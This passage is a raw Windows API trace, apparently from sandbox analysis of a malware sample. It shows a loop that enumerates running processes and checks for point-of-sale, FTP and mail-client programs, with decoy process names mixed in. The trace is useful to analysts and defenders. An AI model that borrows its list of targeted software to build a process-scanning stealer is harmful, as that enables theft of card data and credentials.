th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0185.247] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0185.249] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0185.251] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0185.253] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0185.255] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0185.258] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0185.260] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0185.262] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0185.263] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0185.266] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0185.268] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0185.269] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0185.271] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0185.280] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0185.283] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0185.285] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0185.287] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0185.290] CloseHandle (hObject=0x195c) returned 1 [0185.290] Sleep (dwMilliseconds=0x64) [0185.391] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bcc [0185.407] Process32First (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.409] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0185.411] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0185.414] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.418] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0185.421] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.424] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0185.427] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0185.432] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0185.434] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.437] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.439] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0185.442] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.445] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.448] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.450] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.453] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.455] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.457] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.459] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0185.461] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0185.463] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.465] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0185.466] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.468] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0185.476] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0185.478] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0185.481] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0185.483] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0185.485] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0185.487] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.490] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.492] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0185.494] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.496] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.498] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0185.500] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0185.502] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0185.504] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0185.505] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0185.507] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0185.509] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0185.514] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0185.519] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0185.522] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0185.524] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0185.525] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0185.527] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0185.529] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0185.530] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0185.532] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0185.534] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0185.535] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0185.537] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0185.539] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0185.576] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0185.579] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0185.581] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0185.583] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0185.585] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0185.588] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0185.590] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0185.592] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0185.594] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0185.596] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0185.598] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0185.600] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 